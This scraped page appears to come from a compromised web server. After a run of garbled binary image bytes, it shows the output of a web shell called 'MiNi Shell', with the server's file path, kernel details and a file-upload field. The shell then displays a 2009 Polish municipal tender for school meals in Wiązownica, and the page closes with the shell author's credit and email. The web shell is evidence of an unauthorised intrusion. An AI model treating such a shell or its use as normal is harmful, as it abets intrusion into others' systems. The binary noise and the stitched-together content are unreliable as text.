JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090811/273608-N-2009.html

<p class="kh_header"><b>Wiązownica: DOŻYWIANIE  UCZNIÓW SZKÓŁ PODSTAWOWYCH I GIMNAZJUM  NA TERENIE 
GMINY WIĄZOWNICA</b><br>
<b>Numer ogłoszenia: 273608 - 2009; data zamieszczenia: 11.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOŻYWIANIE  UCZNIÓW SZKÓŁ PODSTAWOWYCH I GIMNAZJUM  NA TERENIE 
GMINY WIĄZOWNICA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach planowanego zadania  przewiduje się świadczenie usług w zakresie:  Dożywiania uczniów  szkół podstawowych i gimnazjum na terenie gminy Wiązownica, w formie   gorących posiłków.
1. PRZEDMIOT ZAMÓWIENIA ZOSTAŁ PODZIELONY NA DWA ODRĘBNE ZADANIA.
ZADANIE NR 1 
Przygotowanie obiadów w stołówce szkolnej gimnazjum w Wiązownicy dla uczniów szkoły podstawowej i gimnazjum w Wiązownicy oraz przygotowanie i dowóz obiadów do szkół podstawowych w Manasterzu, Radawie i Cetuli.
ZADANIE NR 2 
Przygotowanie obiadów w stołówce szkolnej  w Zapałowie dla uczniów szkoły podstawowej i gimnazjum w Zapałowie oraz przygotowanie i dowóz obiadów do szkoły podstawowej w Ryszkowej Woli.
2. Obiady powinny składać się  z 3 dań (zupa, drugie danie, napój)  przygotowane zgodnie z zasadami racjonalnego żywienia.
3. Obiady powinny odpowiadać następującym kryteriom:
-zawartość energii - 850 kcal;
-udział energii z białka - nie mniej niż 12% wartości energetycznej posiłku;
-udział białka zwierzęcego - średnio 50% ogólnej ilości białka zawartego w posiłku;
-udział energii z tłuszczu - do 30%.
Szczegółowy przedmiot zamówienia został określony w  zał. nr 2 do SIWZ.
4. Sposób  przygotowywania  obiadów:
4.1. Zupy należy przygotować na wywarach jarskich (warzywnych) lub mięsnych z dodatkiem głównego składnika. Zupy na wywarach  z kości w ograniczonych ilościach.
4.2. Podprawianie zup niskotłuszczową śmietaną lub mlekiem, albo masłem czy mąką, sporadycznie zasmażka. Przeciętna waga 1 porcji zupy - 400 g.
4.3. Drugie danie -  powinno składać  się z produktów białkowych, najlepiej pochodzenia zwierzęcego (mięso, ryby, drób) produktów bogatych w węglowodany złożone (ziemniaki, kasza, kluski itp.)  oraz dodatków warzywnych (surówki, warzywa gotowane).
5. Zamawiający oczekuje, iż Wykonawca będzie przygotowywał posiłki zgodnie z zalecanym modelem żywienia o charakterze pro zdrowotnym poprzez:
-stosowanie tłuszczów roślinnych;
-ograniczone stosowanie tłuszczów zwierzęcych;
-umiarkowane stosowanie mięsa czerwonego;
-stosowanie mięsa drobiowego;
-stosowanie ryb;
-umiarkowane stosowanie jaj, cukru i soli;
-duży udział warzyw i owoców w posiłkach, w tym także nasion roślin strączkowych.
6.Napój - w ilości 200 ml (kompot, herbata).
7. Obiady dowożone 1-daniowe, zamiennie w takiej samej ilości zupa o zwiększonej 
kaloryczności z pieczywem i drugie danie bez napoju. 
8. Zamawiający zabezpiecza naczynia  ceramiczne  dla potrzeb wydawania   posiłków  wyłącznie  w stołówce gimnazjum w Zapałowie, natomiast w zakresie obiadów dowożonych do szkoły podstawowych, Wykonawca zobowiązany jest do 
zabezpieczenia termosów  oraz jednorazowych  naczyń i sztućców do wydawania 
posiłków oraz  środek transportu.
9. Długość tras dowozu posiłków wynosi:
1. Zapałów  -  Szkoła Podstawowa w Ryszkowej Woli  - 16 km.
2. Wiązownica - SP Manasterz-Wiązownica = 14 km. 
3. Wiązownica - SP Radawa-Wiązownica = 16 km. 
4. Wiązownica - SP Cetula-Wiązownica = 22 km. 

10. Warunki przygotowania posiłków:
W niniejszym zamówieniu przez posiłek należy rozumieć  posiłek gorący ( drugie danie)  o wartości odżywczej i kalorycznej zgodnej z wymogami obowiązującymi w żywieniu dzieci  i młodzieży. 
10.1. Posiłki będą przygotowane w pomieszczeniach kuchni, wyposażonej  w podstawowe urządzenia i sprzęt gastronomiczne, niezbędny do przygotowania i wydawania posiłków, które zostaną użyczone bezpłatnie Wykonawcy.
10.2. Wykonawca będzie pokrywał koszty zużycia gazu i energii elektrycznej. W zamian za sprzątanie  kuchni i stołówki Zamawiający zabezpieczy bezpłatnie  dostawę bieżącej wody  wraz z  odprowadzeniem ścieków.
10.3. Wykonawca  będzie ponosił pełną odpowiedzialność materialną za oddane w użyczenie   pomieszczenia i wyposażenie tych pomieszczeń.
10.4. Posiłki będą kupowane przez uczniów gimnazjum oraz szkół podstawowych, dofinansowane z budżetu  gminy.
10.5. Posiłki wydawane będą w dniach nauki szkolnej, w roku szkolnym  2009/2010.
10.6. Zamawiający zastrzega sobie możliwość zmiany liczby i  rodzajów posiłków
w zależności od zaistniałych potrzeb..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał wniesienia wadium przetargowego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W  przetargu  mogą   wziąć  udział  wykonawcy  nie wykluczeni na podstawie art. 24 ust.  1  i 2  oraz  spełniający  wymogi   art. 22  ust. 1  ustawy  Prawo Zamówień Publicznych i warunki dodatkowe określone w SIWZ.
1)   posiadają uprawnienia do wykonywania określonej działalności lub czynności,  jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień - wykonawcy nie mogą prowadzić innej działalności poza działalnością stanowiącą przedmiot zamówienia. 
2)    posiadają niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym  i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
- udokumentują wykonanie co najmniej 1 usługi w zakresie  dożywiania osób  o wartości min. 50 000 zł. odpowiadającej przedmiotowi zamówienia -  w okresie ostatnich 3 lat, a  jeżeli  okres działalności jest krótszy, to w tym okresie z podaniem ich wartości, daty i miejsce wykonania.
- działalność stanowiąca przedmiot zamówienia  musi być prowadzona  co najmniej przez okres  1 roku szkolnego;  
- dysponują  co najmniej 2 osobami  posiadającymi kwalifikacje  i uprawnienia niezbędne do realizacji przedmiotu zamówienia ;
3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
Zamawiający wymaga, aby przedmiot zamówienia Wykonawca wykonywał osobiście, co oznacza, że Zamawiający nie dopuszcza możliwości zlecania całości lub części przedmiotu zamówienia  podwykonawcom. 

Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
2.1. Wykonawców, którzy nie spełniają warunków o których mowa w art. 24 ust. 1 ustawy Prawo  zamówień publicznych, oraz wykonawców którzy;
2.1.1.	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami  uczestniczącymi  w dokonywaniu tych czynności, chyba że udział tych 
wykonawców w postępowaniu nie utrudni uczciwej konkurencji;
2.1.2.	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
2.1.3.	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają   błędy, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.
2.1.4. nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie  zgodzili się na przedłużenie okresu związania ofertą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania działalności lub czynności oraz nie  podlega wykluczeniu na podstawie art. 24ust. 1 i 2 ustawy z dnia 29stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty określone w rozporządzeniu Prezesa Rady Ministrów  w sprawie rodzajów dokumentów, jakich może  żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty  mogą być składane, a  w szczególności:
1.1. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.2. aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące  przed upływem terminu  składania ofert;
1.3. aktualne zaświadczenie  właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące  przed upływem terminu  składania ofert;
1.4. oświadczenie do postępowania o zamówienie publiczne z art. 22 ust.1 i 24 ust. 1 i 2  ustawy Prawo zamówień publicznych z wykorzystaniem wzoru- załącznik nr 4.
2. W celu potwierdzenia , że wykonawca posiada niezbędną wiedzę i doświadczenie oraz  dysponuje potencjałem  technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia wykonawca składa następujące dokumenty:
 2.1. wykaz wykonanych w okresie ostatnich 3 lat  przed dniem wszczęcia postępowania usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i  wartością usługom  stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów (referencje Inwestorów) potwierdzających,  że usługi te zostały wykonane należycie; zał. nr 6;
2.2. wykazu osób którymi dysponuje lub będzie dysponował wykonawca i które będą  uczestniczyć  w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania  zamówienia a także zakresu wykonywanych przez nich czynności zał. nr 5
2.3. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt. 2.2.  wykonawca wskazał, którymi będzie dysponował.
2.4. dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich  uprawnień; - do wykazu należy dołączyć  następujące dokumenty potwierdzające posiadanie przez wskazane osoby uprawnienia:
 2.4.1. aktualna książeczka zdrowia do celów sanitarno - epidemiologicznych;   
 2.4.2. zaświadczenie z przebytego szkolenia z podstawowych zasad higieny w zakresie zbiorowego żywienia, lub oświadczenie  wykonawcy , że  powyższe zagadnienia  były przedmiotem nauczania zawodowego w szkole ( należy dołączyć świadectwo ukończenia szkoły).
oraz  pozostałe niezbędne dokumenty:
- formularz ofertowy z wykorzystaniem wzoru- załącznik nr 1;
- kosztorys ofertowy szczegółowy- zał. Nr 2
- parafowany projekt umowy  - zał. nr 3,
- pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia.
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych   za zgodność z oryginałem przez osobę  osoby uprawnioną do reprezentowania wykonawcy  we właściwym rejestrze lub ewidencji działalności gospodarczej.
4. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w dziale IX pkt. 1 ppkt. 1.1. - 1.3.  składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty o których mowa w pkt. 1 i 2   powinny być wystawione nie wcześniej  niż 6 miesięcy przed upływem terminu do składania ofert, natomiast dokument wymieniony w pkt. 3  powinien zostać wystawiony nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.
5. Wykonawcy wspólnie ubiegający  się o udzielenie zamówienia:
5.1.W przypadku wspólnego ubiegania się o udzielenie zamówienia publicznego (konsorcjum) wykonawcy są  zobowiązani ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do   zawarcia umowy, które winno  zostać dołączone do oferty przetargowej.
5.2.Upoważnienie do pełnienia funkcji  PEŁNOMOCNIKA wymaga podpisu prawnie  
upoważnionych przedstawicieli każdego z partnerów w oryginale lub kopii potwierdzonych  notarialnie - które należy również załączyć do oferty;
5.3.Treść pełnomocnictwa powinna dokładnie określać zakres  udzielonego pełnomocnictwa.
5.4.Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi spełnić warunki  udziału w postępowaniu określone w dziale VIII. w pkt. 1.1 i 1.4  i złożyć na potwierdzenie spełniania tych warunków dokumenty wymienione w Dziale IX pkt. 1 ppkt. 1.1 do 1.4. SIWZ w oryginale lub kopii  potwierdzone za  zgodność z  oryginałem.
5.5.Warunki udziału w postępowaniu o udzielenie zamówienia publicznego  opisane w Dziale VIII pkt. 1.2 i 1.3.   wykonawcy  mogą spełniać  wspólnie, przy czym dokumenty wymienione w  dziale IX  pkt. 2 ppkt. 2.1. - 2.4.  muszą zostać złożone przez wszystkich wykonawców występujących wspólnie w oryginale  lub kopii  potwierdzone za  zgodność z  oryginałem.
5.6.Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za  niewykonanie lub nienależyte wykonanie zobowiązań.
5.7. Przed podpisaniem  umowy na wykonanie przedmiotu umowy Wykonawcy występujący wspólnie zobowiązani są przedłożyć zamawiającemu do wglądu oryginał umowy konsorcjum..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com  lub www.bip.wiazownica.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica
pok. nr 42   II p..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2009 godzina 09:00, miejsce: Urząd Gminy Wiązownica
37-522 Wiązownica
Sekretariat Urzędu
pok. nr 22   I p..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie obiadów w stołówce szkolnej gimnazjum w Wiązownicy dla uczniów szkoły podstawowej i gimnazjum w Wiązownicy oraz przygotowanie i dowóz obiadów do szkół podstawowych w Manasterzu, Radawie i Cetuli..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przygotowanie obiadów w stołówce szkolnej gimnazjum w Wiązownicy dla uczniów szkoły podstawowej i gimnazjum w Wiązownicy oraz przygotowanie i dowóz obiadów do szkół podstawowych w Manasterzu, Radawie i Cetuli.
2. Obiady powinny składać się  z 3 dań (zupa, drugie danie, napój)  przygotowane zgodnie z zasadami racjonalnego żywienia.
3. Obiady powinny odpowiadać następującym kryteriom:
- zawartość energii - 850 kcal;
- udział energii z białka - nie mniej niż 12% wartości energetycznej posiłku;
- udział białka zwierzęcego - średnio 50% ogólnej ilości białka zawartego w posiłku;
- udział energii z tłuszczu - do 30%.
Szczegółowy przedmiot zamówienia został określony w  zał. nr 2 do SIWZ.
4. Długość tras dowozu posiłków wynosi:
Wiązownica - SP Manasterz-Wiązownica = 14 km. 
Wiązownica - SP Radawa-Wiązownica = 16 km. 
Wiązownica - SP Cetula-Wiązownica = 22 km..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie obiadów w stołówce szkolnej  w Zapałowie dla uczniów szkoły podstawowej 
i gimnazjum w Zapałowie oraz przygotowanie i dowóz obiadów do szkoły podstawowej 
w Ryszkowej Woli..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przygotowanie obiadów w stołówce szkolnej  w Zapałowie dla uczniów szkoły podstawowej i gimnazjum w Zapałowie oraz przygotowanie i dowóz obiadów do szkoły podstawowej 
w Ryszkowej Woli.
2. Obiady powinny składać się  z 3 dań (zupa, drugie danie, napój)  przygotowane zgodnie z zasadami racjonalnego żywienia.
3. Obiady powinny odpowiadać następującym kryteriom:
- zawartość energii - 850 kcal;
- udział energii z białka - nie mniej niż 12% wartości energetycznej posiłku;
- udział białka zwierzęcego - średnio 50% ogólnej ilości białka zawartego w posiłku;
- udział energii z tłuszczu - do 30%.
Szczegółowy przedmiot zamówienia został określony w  zał. nr 2 do SIWZ
4.Długość tras dowozu posiłków wynosi:
Zapałów  -  Szkoła Podstawowa w Ryszkowej Woli  - 16 km..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com